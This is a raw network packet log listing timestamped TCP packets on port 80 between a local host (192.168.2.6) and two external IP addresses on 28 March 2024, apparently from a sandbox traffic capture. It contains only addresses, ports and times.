                                                                                                                                                                                                                                      Mar 28, 2024 17:50:15.575877905 CET4970780192.168.2.681.94.159.197
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:15.800206900 CET804970781.94.159.197192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:15.825031042 CET804970781.94.159.197192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:15.828208923 CET4970780192.168.2.681.94.159.197
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:15.828243971 CET4970780192.168.2.681.94.159.197
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:16.052232981 CET804970781.94.159.197192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:16.067440987 CET804970781.94.159.197192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:16.070019960 CET4970780192.168.2.681.94.159.197
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:16.070020914 CET4970780192.168.2.681.94.159.197
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:16.293764114 CET804970781.94.159.197192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:16.310921907 CET804970781.94.159.197192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:16.356506109 CET4970780192.168.2.681.94.159.197
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:20.355617046 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:20.538861990 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:20.538954973 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:20.539083958 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:20.765417099 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.210280895 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.210349083 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.210361958 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.210375071 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.210422039 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.210460901 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.392369986 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.392394066 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.392406940 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.392421007 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.392433882 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.392446995 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.392461061 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.392502069 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.392545938 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.575210094 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.622123957 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.696990967 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.697130919 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.697144032 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.697155952 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.697173119 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.697184086 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.697185993 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.697201014 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.697207928 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.697212934 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.697227001 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.697240114 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.697271109 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.697278976 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.697293043 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.697293043 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.697340965 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.701991081 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.747117996 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.802911043 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.803029060 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.803080082 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.880961895 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.881045103 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.881103992 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.881145000 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.881270885 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.881310940 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.881330013 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.881382942 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.881424904 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.881428957 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.881501913 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.881550074 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.942353964 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.942370892 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.942383051 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.942394972 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.942408085 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.942420006 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.942431927 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.942444086 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.942456961 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.942461014 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.942470074 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.942482948 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.942496061 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.942506075 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.942532063 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.942540884 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.946938038 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.946971893 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.947014093 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.947027922 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.947041035 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.947082996 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:22.424794912 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:22.424818993 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:22.424830914 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:22.424845934 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:22.424859047 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:22.424871922 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:22.424884081 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:22.424895048 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:22.424896955 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:22.424912930 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:22.424963951 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:22.424976110 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:22.425014019 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:22.425061941 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:22.425061941 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:22.425061941 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:22.425142050 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:22.429562092 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:22.429579973 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:22.429611921 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:22.429625034 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:22.429625988 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:22.429665089 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:22.668411016 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:22.668440104 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:22.668478966 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:22.668543100 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:22.668543100 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:22.668560028 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:22.668596983 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:22.668611050 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:22.668623924 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:22.668636084 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:22.668658018 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:22.668678999 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:22.913827896 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:22.913850069 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:22.913922071 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:22.913938046 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:22.913990021 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:22.914038897 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:22.914041042 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:22.914112091 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:22.914155960 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:22.914156914 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:22.914196014 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:22.914242983 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:23.230534077 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:23.230555058 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:23.230618954 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:23.230617046 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:23.230707884 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:23.230756044 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:23.230763912 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:23.230791092 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:23.230843067 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:23.403143883 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:23.403163910 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:23.403179884 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:23.403192043 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:23.403209925 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:23.403223991 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:23.403232098 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:23.403237104 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:23.403251886 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:23.403275967 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:23.403276920 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:23.403301954 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:23.403307915 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:23.403356075 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:23.403367996 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:23.403393984 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:23.450280905 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:23.648566961 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:23.648588896 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:23.648655891 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:23.648660898 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:23.648746967 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:23.648809910 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:23.648828030 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:23.648914099 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:23.648957968 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:23.740353107 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:23.740398884 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:23.740413904 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:23.740452051 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:23.740474939 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:23.740520000 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:23.740526915 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:23.740540028 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:23.740590096 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:23.892926931 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:23.892947912 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:23.893042088 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:23.893131971 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:23.893155098 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:23.893213987 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:23.981554031 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:23.981578112 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:23.981592894 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:23.981632948 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:23.981683969 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:23.981728077 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:23.981746912 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:23.981800079 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:23.981861115 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:24.137732029 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:24.137754917 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:24.137768984 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:24.137784958 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:24.137876034 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:24.472464085 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:24.472496033 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:24.472508907 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:24.472537041 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:24.472547054 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:24.472589016 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:24.472590923 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:24.472604990 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:24.472619057 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:24.472630978 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:24.472646952 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:24.472681999 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:24.627695084 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:24.627723932 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:24.627803087 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:24.627804995 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:24.627863884 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:24.627918005 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:25.367698908 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:25.367718935 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:25.367732048 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:25.367748976 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:25.367770910 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:25.367810965 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:25.367818117 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:25.367831945 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:25.367846966 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:25.367872953 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:25.367961884 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:25.368007898 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:25.368136883 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:25.368150949 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:25.368164062 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:25.368192911 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:25.368300915 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:25.368360043 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:25.372315884 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:25.372328997 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:25.372379065 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:25.850625992 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:25.850673914 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:25.850713015 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:25.850776911 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:25.850794077 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:25.850825071 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:25.850836039 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:25.850866079 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:25.850915909 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:25.850917101 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:25.850979090 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:25.850992918 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:25.851021051 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:25.903518915 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:26.092241049 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:26.092370987 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:26.092427969 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:26.092453003 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:26.137763977 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:26.410797119 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:26.410820961 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:26.410832882 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:26.410851002 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:26.410870075 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:26.410882950 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:26.410897017 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:26.410931110 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:26.410978079 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:27.127372026 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:27.127413988 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:27.127428055 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:27.127444029 CET8049708189.232.22.59192.168.2.6
